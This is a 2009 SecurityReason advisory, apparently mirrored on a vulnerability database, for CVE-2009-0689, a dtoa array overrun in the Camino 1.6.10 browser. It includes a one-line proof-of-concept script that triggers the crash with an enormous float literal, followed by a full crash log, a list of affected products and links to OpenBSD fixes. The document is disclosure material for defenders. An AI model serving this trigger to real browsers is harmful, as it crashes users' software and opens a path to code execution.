Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22933
HistoryDec 15, 2009 - 12:00 a.m.

Camino 1.6.10 Remote Array Overrun (Arbitrary code execution)

2009-12-1500:00:00
vulners.com
24

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:

    • Dis.: 07.05.2009
    • Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:

    • Camino 1.6.10

Fixed in:

    • Camino 2.0 <=

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/76

  • — 0.Description —
    Camino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source,
    GUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac
    OS X operating system. In place of an XUL-based user interface used by most Mozilla-based
    applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.

  • — 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) —
    The main problem exist in dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey,
    Chrome, Opera etc.
    and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.

  • — 2. Proof of Concept (PoC) —

<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>


Process: Camino [153]
Path: /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier: org.mozilla.camino
Version: 1.6.10 (1609.09.25)
Code Type: X86 (Native)
Parent Process: launchd [92]

Date/Time: 2009-11-06 12:57:24.698 -0800
OS Version: Mac OS X 10.5.6 (9G55)
Report Version: 6

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590
Crashed Thread: 0

Thread 0 Crashed:
0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235
1 libSystem.B.dylib 0x01d7710d szone_malloc + 180
2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81
3 libSystem.B.dylib 0x01d76fac malloc + 55
4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220
5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282
6 org.mozilla.camino 0x0038ae0e
nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7 org.mozilla.camino 0x0038b215
nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*,
void*) + 24
9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int
()(nsIStyleRuleProcessor, void*), RuleProcessorData*) + 37
10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*,
nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123
11 org.mozilla.camino 0x002cc924
nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12 org.mozilla.camino 0x002f617b PresShell::InitialReflow(int, int) + 1151
13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout(int) + 342
14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout() + 82
15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&)

  • 193
    16 org.mozilla.camino 0x001a60e8 CNavDTD::OpenBody(nsCParserNode const*) + 54
    17 org.mozilla.camino 0x001a8b53 CNavDTD::HandleDefaultStartToken(CToken*,
    nsHTMLTag, nsCParserNode*) + 393
    18 org.mozilla.camino 0x001aa3e5 CNavDTD::HandleStartToken(CToken*) + 623
    19 org.mozilla.camino 0x001aaaa2 CNavDTD::HandleToken(CToken*, nsIParser*) + 1358
    20 org.mozilla.camino 0x001a9a4d CNavDTD::BuildModel(nsIParser*, nsITokenizer*,
    nsITokenObserver*, nsIContentSink*) + 165
    21 org.mozilla.camino 0x001a94ee CNavDTD::DidBuildModel(unsigned int, int,
    nsIParser*, nsIContentSink*) + 550
    22 org.mozilla.camino 0x001b5e28 nsParser::DidBuildModel(unsigned int) + 90
    23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int, int, int) + 661
    24 org.mozilla.camino 0x001b59a8 nsParser::OnStopRequest(nsIRequest*,
    nsISupports*, unsigned int) + 128
    25 org.mozilla.camino 0x002076a0 nsDocumentOpenInfo::OnStopRequest(nsIRequest*,
    nsISupports*, unsigned int) + 88
    26 org.mozilla.camino 0x000f522a nsFileChannel::OnStopRequest(nsIRequest*,
    nsISupports*, unsigned int) + 78
    27 org.mozilla.camino 0x000baf18 nsInputStreamPump::OnStateStop() + 88
    28 org.mozilla.camino 0x000bb49d
    nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133
    29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process() + 751
    30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21
    31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103
    32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141
    33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88
    34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode + 283
    35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374
    36 com.apple.HIToolbox 0x02d8af4d BlockUntilNextEventMatchingListInMode + 106
    37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657
    38 com.apple.AppKit 0x05e94630 -[NSApplication
    nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
    39 com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795
    40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574
    41 org.mozilla.camino 0x0000364c main + 196
    42 org.mozilla.camino 0x00002f1e _start + 216
    43 org.mozilla.camino 0x00002e45 start + 41

Thread 1:
0 libSystem.B.dylib 0x01dad30a select$DARWIN_EXTSN$NOCANCEL + 10
1 libnspr4.dylib 0x00d3940e poll + 258
2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134
3 org.mozilla.camino 0x000cb897 nsSocketTransportService::Poll(unsigned int*) +
99
4 org.mozilla.camino 0x000cbe75 nsSocketTransportService::Run() + 497
5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 2:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74
6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41
7 libnspr4.dylib 0x00d37309 _pt_root + 150
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321
9 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 3:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 4:
0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10
1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003 + 73
2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54
3 libSystem.B.dylib 0x01da7095 _pthread_start + 321
4 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 5:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000d43ce nsHostResolver::GetHostToLookup(nsHostRecord**)

  • 212
    6 org.mozilla.camino 0x000d4b2d nsHostResolver::ThreadFunc(void*) + 123
    7 libnspr4.dylib 0x00d37309 _pt_root + 150
    8 libSystem.B.dylib 0x01da7095 _pthread_start + 321
    9 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 6:
0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10
1 libSystem.B.dylib 0x01da7095 _pthread_start + 321
2 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 7:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 0 crashed with X86 Thread State (32-bit):
eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590
edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190
ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017
ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037
cr2: 0x7e33d590

  • — 3. SecurityReason Note —
    Officialy SREASONRES:20090625 has been detected in:
    • OpenBSD
    • NetBSD
    • FreeBSD
    • MacOSX
    • Google Chrome
    • Mozilla Firefox
    • Mozilla Seamonkey
    • Mozilla Thunderbird
    • Mozilla Sunbird
    • Mozilla Camino
    • KDE (example: konqueror)
    • Opera
    • K-Meleon
    • F-Lock

This list is not yet closed.

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c

  • — 5. Credits —
    Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.

  • — 6. Greets —
    Infospec p_e_a pi3

  • — 7. Contact —
    Email:

    • cxib {a.t] securityreason [d0t} com
    • sp3x {a.t] securityreason [d0t} com

GPG:

http://securityreason.com/
http://securityreason.pl/

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkshevAACgkQpiCeOKaYa9aj5gCcDrfDkGIjDV2Fo+J402jTE7u3
rwYAni4FngpFFwhcsuoZjNGeeh68lJQ+
=eZDR
-----END PGP SIGNATURE-----